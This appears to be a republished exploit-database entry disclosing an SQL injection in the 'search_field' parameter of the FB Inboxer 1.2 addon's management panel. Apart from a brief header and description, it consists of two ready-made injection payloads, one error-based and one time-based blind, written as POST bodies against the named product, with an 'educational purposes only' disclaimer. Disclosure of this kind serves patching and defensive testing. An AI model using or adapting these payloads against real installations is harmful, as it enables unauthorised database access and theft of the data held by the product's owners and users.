Exploits / Vulnerability Discovered : 2018-08-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Pageresponse fb inboxer addon 1.2 search_field sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: FB Inboxer 1.2 - 'search_field' SQL Injection
# Google Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/pageresponse-a-fb-inboxer-addon-facebook-auto-commentprivate-reply-likeshare-for-full-page/21486371
# Version: 1.2
# Tested on: Kali linux
====================================================
Description : The vulnerability allows an attacker to inject sql commands
from the search section with 'search_field' parameter in the management
panel.
Parameter: search_field (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: search_text=tes&search_field=name AND (SELECT 4580 FROM(SELECT
COUNT(*),CONCAT(0x71716a7671,(SELECT
(ELT(4580=4580,1))),0x7170717671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: search_text=tes&search_field=name AND
SLEEP(5)&per_page=15&order_by[0]=id&order_by[1]=asc&page=1